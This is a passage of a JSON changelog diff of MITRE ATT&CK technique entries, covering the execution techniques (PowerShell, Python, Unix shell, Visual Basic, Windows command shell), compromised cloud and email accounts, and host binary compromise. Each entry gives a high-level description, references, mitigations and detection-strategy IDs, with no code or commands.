+                    "description": "Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell's underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1059/001",
+                            "external_id": "T1059.001"
+                        },
+                        {
+                            "source_name": "Microsoft PSfromCsharp APR 2014",
+                            "description": "Babinec, K. (2014, April 28). Executing PowerShell scripts from C#. Retrieved April 22, 2019.",
+                            "url": "https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/"
+                        },
+                        {
+                            "source_name": "SilentBreak Offensive PS Dec 2015",
+                            "description": "Christensen, L.. (2015, December 28). The Evolution of Offensive PowerShell Invocation. Retrieved December 8, 2018.",
+                            "url": "https://web.archive.org/web/20190508170150/https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/"
+                        },
+                        {
+                            "source_name": "FireEye PowerShell Logging 2016",
+                            "description": "Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html"
+                        },
+                        {
+                            "source_name": "Github PSAttack",
+                            "description": "Haight, J. (2016, April 21). PS>Attack. Retrieved September 27, 2024.",
+                            "url": "https://github.com/Exploit-install/PSAttack-1"
+                        },
+                        {
+                            "source_name": "inv_ps_attacks",
+                            "description": "Hastings, M. (2014, July 16). Investigating PowerShell Attacks. Retrieved December 1, 2021.",
+                            "url": "https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/"
+                        },
+                        {
+                            "source_name": "Malware Archaeology PowerShell Cheat Sheet",
+                            "description": "Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016.",
+                            "url": "http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf"
+                        },
+                        {
+                            "source_name": "TechNet PowerShell",
+                            "description": "Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016.",
+                            "url": "https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx"
+                        },
+                        {
+                            "source_name": "Sixdub PowerPick Jan 2016",
+                            "description": "Warner, J.. (2015, January 6). Inexorable PowerShell \u2013 A Red Teamer\u2019s Tale of Overcoming Simple AppLocker Policies. Retrieved December 8, 2018.",
+                            "url": "https://web.archive.org/web/20160327101330/http://www.sixdub.net/?p=367"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Mayuresh Dani, Qualys",
+                        "Praetorian",
+                        "Ross Brittain"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2025-10-24 17:49:07.660000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.5",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1026: Privileged Account Management",
+                            "M1038: Execution Prevention",
+                            "M1042: Disable or Remove Feature or Program",
+                            "M1045: Code Signing",
+                            "M1049: Antivirus/Antimalware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0455: Abuse of PowerShell for Arbitrary Execution"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-09 14:38:24.334000+00:00",
+                    "modified": "2026-05-12 15:12:00.716000+00:00",
+                    "name": "Python",
+                    "description": "Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.(Citation: Zscaler APT31 Covid-19 October 2020)\n\nPython comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1059/006",
+                            "external_id": "T1059.006"
+                        },
+                        {
+                            "source_name": "Zscaler APT31 Covid-19 October 2020",
+                            "description": "Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021.",
+                            "url": "https://www.zscaler.com/blogs/security-research/apt-31-leverages-covid-19-vaccine-theme-and-abuses-legitimate-online"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.716000+00:00\", \"old_value\": \"2025-10-24 17:49:23.660000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1033: Limit Software Installation",
+                            "M1038: Execution Prevention",
+                            "M1047: Audit",
+                            "M1049: Antivirus/Antimalware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0063: Cross-Platform Behavioral Detection of Python Execution"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-09 14:15:05.330000+00:00",
+                    "modified": "2026-05-12 15:12:00.707000+00:00",
+                    "name": "Unix Shell",
+                    "description": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux, macOS, and ESXi systems, though many variations of the Unix shell exist (e.g. sh, ash, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.\n\nUnix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.\n\nSome systems, such as embedded devices, lightweight Linux distributions, and ESXi servers, may leverage stripped-down Unix shells via Busybox, a small executable that contains a variety of tools, including a simple shell.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1059/004",
+                            "external_id": "T1059.004"
+                        },
+                        {
+                            "source_name": "Apple ZShell",
+                            "description": "Apple. (2020, January 28). Use zsh as the default shell on your Mac. Retrieved June 12, 2020.",
+                            "url": "https://support.apple.com/HT208050"
+                        },
+                        {
+                            "source_name": "DieNet Bash",
+                            "description": "die.net. (n.d.). bash(1) - Linux man page. Retrieved June 12, 2020.",
+                            "url": "https://linux.die.net/man/1/bash"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "1.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.707000+00:00\", \"old_value\": \"2025-10-24 17:49:12.476000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0384: Behavioral Detection of Unix Shell Execution"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-09 14:29:51.508000+00:00",
+                    "modified": "2026-05-12 15:12:00.722000+00:00",
+                    "name": "Visual Basic",
+                    "description": "Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)\n\nDerivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)\n\nAdversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking )",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1059/005",
+                            "external_id": "T1059.005"
+                        },
+                        {
+                            "source_name": "VB .NET Mar 2020",
+                            "description": ".NET Team. (2020, March 11). Visual Basic support planned for .NET 5.0. Retrieved June 23, 2020.",
+                            "url": "https://devblogs.microsoft.com/vbteam/visual-basic-support-planned-for-net-5-0/"
+                        },
+                        {
+                            "source_name": "Default VBS macros Blocking ",
+                            "description": "Kellie Eickmeyer. (2022, February 7). Helping users stay safe: Blocking internet macros by default in Office. Retrieved February 7, 2022.",
+                            "url": "https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805"
+                        },
+                        {
+                            "source_name": "Microsoft VBScript",
+                            "description": "Microsoft. (2011, April 19). What Is VBScript?. Retrieved March 28, 2020.",
+                            "url": "https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)"
+                        },
+                        {
+                            "source_name": "Microsoft VBA",
+                            "description": "Microsoft. (2019, June 11). Office VBA Reference. Retrieved June 23, 2020.",
+                            "url": "https://docs.microsoft.com/office/vba/api/overview/"
+                        },
+                        {
+                            "source_name": "VB Microsoft",
+                            "description": "Microsoft. (n.d.). Visual Basic documentation. Retrieved June 23, 2020.",
+                            "url": "https://docs.microsoft.com/dotnet/visual-basic/"
+                        },
+                        {
+                            "source_name": "Wikipedia VBA",
+                            "description": "Wikipedia. (n.d.). Visual Basic for Applications. Retrieved August 13, 2020.",
+                            "url": "https://en.wikipedia.org/wiki/Visual_Basic_for_Applications"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.722000+00:00\", \"old_value\": \"2025-10-24 17:49:29.678000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.5",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1021: Restrict Web-Based Content",
+                            "M1038: Execution Prevention",
+                            "M1040: Behavior Prevention on Endpoint",
+                            "M1042: Disable or Remove Feature or Program",
+                            "M1049: Antivirus/Antimalware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0076: Behavioral Detection of Visual Basic Execution (VBS/VBA/VBScript)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-03-09 14:12:31.196000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Windows Command Shell",
+                    "description": "Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)\n\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "execution"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1059/003",
+                            "external_id": "T1059.003"
+                        },
+                        {
+                            "source_name": "SSH in Windows",
+                            "description": "Microsoft. (2020, May 19). Tutorial: SSH in Windows Terminal. Retrieved July 26, 2021.",
+                            "url": "https://docs.microsoft.com/en-us/windows/terminal/tutorials/ssh"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_remote_support": false,
+                    "x_mitre_version": "1.5",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2025-10-24 17:49:25.722000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.5",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0202: Behavioral Detection of Windows Command Shell Execution"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-05-27 14:30:01.904000+00:00",
+                    "modified": "2026-05-12 15:12:00.628000+00:00",
+                    "name": "Cloud Accounts",
+                    "description": "Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)\n\nA variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1586/003",
+                            "external_id": "T1586.003"
+                        },
+                        {
+                            "source_name": "Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022",
+                            "description": "Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.",
+                            "url": "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/"
+                        },
+                        {
+                            "source_name": "Awake Security C2 Cloud",
+                            "description": "Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting Command & Control in the Cloud. Retrieved May 27, 2022.",
+                            "url": "https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/"
+                        },
+                        {
+                            "source_name": "Netcraft SendGrid 2024",
+                            "description": "Graham Edgecombe. (2024, February 7). Phishception \u2013 SendGrid is abused to host phishing attacks impersonating itself. Retrieved October 15, 2024.",
+                            "url": "https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/"
+                        },
+                        {
+                            "source_name": "MSTIC Nobelium Oct 2021",
+                            "description": "Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM targeting delegated administrative privileges to facilitate broader attacks. Retrieved March 25, 2022.",
+                            "url": "https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Francesco Bigarella"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.628000+00:00\", \"old_value\": \"2025-10-24 17:48:41.215000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0879: Detection of Cloud Accounts"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--3dc8c101-d4db-4f4d-8150-1b5a76ca5f1b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-01 01:20:53.104000+00:00",
+                    "modified": "2026-05-12 15:12:00.628000+00:00",
+                    "name": "Email Accounts",
+                    "description": "Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).\n\nA variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or [Phishing](https://attack.mitre.org/techniques/T1566) emails may evade reputation-based email filtering rules.\n\nAdversaries can use a compromised email account to hijack existing email threads with targets of interest.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1586/002",
+                            "external_id": "T1586.002"
+                        },
+                        {
+                            "source_name": "AnonHBGary",
+                            "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.",
+                            "url": "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/"
+                        },
+                        {
+                            "source_name": "Microsoft DEV-0537",
+                            "description": "Microsoft. (2022, March 22). DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Retrieved March 23, 2022.",
+                            "url": "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Tristan Bennett, Seamless Intelligence",
+                        "Bryan Onel"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.628000+00:00\", \"old_value\": \"2025-10-24 17:48:41.309000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0861: Detection of Email Accounts"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 18:18:34.279000+00:00",
+                    "modified": "2026-05-12 15:12:00.706000+00:00",
+                    "name": "Compromise Host Software Binary",
+                    "description": "Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.\n\nAdversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)\n\nAn adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary\u2019s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)\n\nAfter modifying a binary, an adversary may attempt to impair defenses by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
